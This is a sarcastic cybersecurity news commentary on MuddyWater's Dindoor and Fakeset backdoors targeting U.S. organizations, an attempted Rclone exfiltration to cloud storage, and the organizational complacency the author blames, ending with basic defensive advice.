If you're still convinced your bank or favorite airline is too big to fail—let alone to get hacked—you haven't been paying attention to the MuddyWater saga. The Iranian advanced persistent threat group, blamed for years of targeting Western interests, has now dropped two new backdoors on U.S. organizations: Dindoor and Fakeset. The FBI surely cares, but the real question is why this keeps happening, again and again, with the same miserable results.
The New Malware in Town: Dindoor and Fakeset
Let's get specific. MuddyWater (or Seedworm, if you prefer your threats with cutesy code names) just escalated its campaign with Dindoor and Fakeset. Dindoor runs on the Deno runtime for JavaScript and TypeScript—yes, that's the hip new runtime you probably haven't patched in six months. Fakeset, meanwhile, is a Python-based backdoor. Both come signed with digital certificates allegedly issued to "Amy Cherne" and "Donald Gay," names that cropped up in earlier MuddyWater campaigns like some sort of malware family tree nobody asked for.
These aren't your off-the-shelf infostealers. They're specialized, tailored, and designed to do one thing: crack open U.S. infrastructure and exfiltrate whatever data you thought was safe behind all those expensive firewalls and compliance checklists. Dindoor and Fakeset have already burrowed into networks that matter—financial institutions, defense and aerospace suppliers, even NGOs—because phishing emails and old web app exploits remain the infection vectors of choice many organizations refuse to close.
Who’s Being Targeted and Why?
If it feels like sector after sector in the U.S. is always getting breached, it's not your imagination. MuddyWater’s recent victims include a U.S. bank, an airport, a defense contractor with ties to Israel, and several North American NGOs. None of them saw this coming, which is both sad and unsurprising.
This latest campaign follows joint U.S.-Israeli airstrikes on Iran in February. In other words, it's not hard to figure out the motive: retaliation, espionage, and yet another not-so-cold phase in the ongoing cyber cold war. Is this a rare event? Hardly. MuddyWater and its overlords at Iran's Ministry of Intelligence and Security have staged operations like this since at least 2018. Your data is just the current collateral damage.
Stealing Data: Rclone and the Cloud
Researchers spotted something familiar and dreadfully efficient in this attack—an attempt to siphon data using Rclone, a well-known tool for quietly copying files out of a victim's network, straight to a Wasabi cloud storage bucket. Did it work? Nobody's sure yet, but that's not actually the point. The point is that a well-resourced APT group used standard, freely available tools to move high-value data, undetected, through cloud channels everyone supposedly "monitors." If you're a security vendor, now's the time to pretend this is new. If you're actually in charge of security, good luck explaining why you missed it.
Initial Access: The Same Old Tricks Still Work
Despite all the money thrown at cybersecurity, phishing emails and unpatched apps are still the winning ticket for attackers. MuddyWater isn't about zero-day wizardry or intricate supply chain attacks every week. Most breaches still come down to someone clicking the wrong link—or a critical web application that hasn't seen a patch since the last round of "urgent" security meetings.
The real problem? Organizations refuse to fix the basics. Phishing training is reduced to drab online modules nobody remembers. Patching gets deferred because of "critical business processes." Never mind that these excuses leave the barn door wide open for the likes of MuddyWater to stroll in, drop some Dindoor, and leave with whatever data they want.
The Historical Context That Should Scare You
MuddyWater isn't just another crew of script kiddies. This is a persistent, state-backed threat operation run by Iran's MOIS, and they've been honing their tactics for nearly a decade. Previous targets span government agencies, telecoms, and real critical infrastructure—the kind you mostly hear about during Congressional hearings, after the fact. Every few months, the tools get a bit better, the attacks more focused, and the West is still on the losing side of this asymmetrical cyber fight. The Dindoor and Fakeset episode is just the latest offensive in a campaign that’s not slowing down.
What Are We Doing Wrong?
You'd think, after years of being hit with these threats, organizations would have learned something. You'd be wrong. MuddyWater, like many APTs, thrives on systemic complacency and perpetual underinvestment in real defensive measures.
- Advanced phishing detection? Still missing in too many environments, or implemented as a tick-box exercise.
- Patching urgent vulnerabilities? Only when regulators threaten fines, and even then, expect delays.
- Outbound traffic monitoring? Sure, until budgets get cut or complexity gets too high.
- Multi-factor authentication? Implemented on some critical accounts. For everyone else, maybe next year.
- Regular security audits? If they happen, they’re rarely thorough, and findings end up in the bottom drawer.
The cybersecurity echo chamber is full of advice, but let's be honest: most of it goes nowhere. That means attackers don't have to break a sweat. They just keep doing what works, because it works.
So, What Now?
The threat from MuddyWater doesn't look like it’ll fade. The U.S. and its allies have shown little appetite for actual deterrence in the digital domain. As for organizations in banking, defense, and critical infrastructure, it’s long past time to do more than buy the latest security appliance or nod sagely at industry guidelines. Patch your apps. Train your users like you mean it. Monitor everything. Set up multi-factor authentication everywhere, not just where it’s easy.
MuddyWater’s ongoing campaign is a wake-up call, but let's not kid ourselves—most will hit snooze. So if you wake up to your own data in a Wasabi bucket halfway across the world, don’t say you weren’t warned.
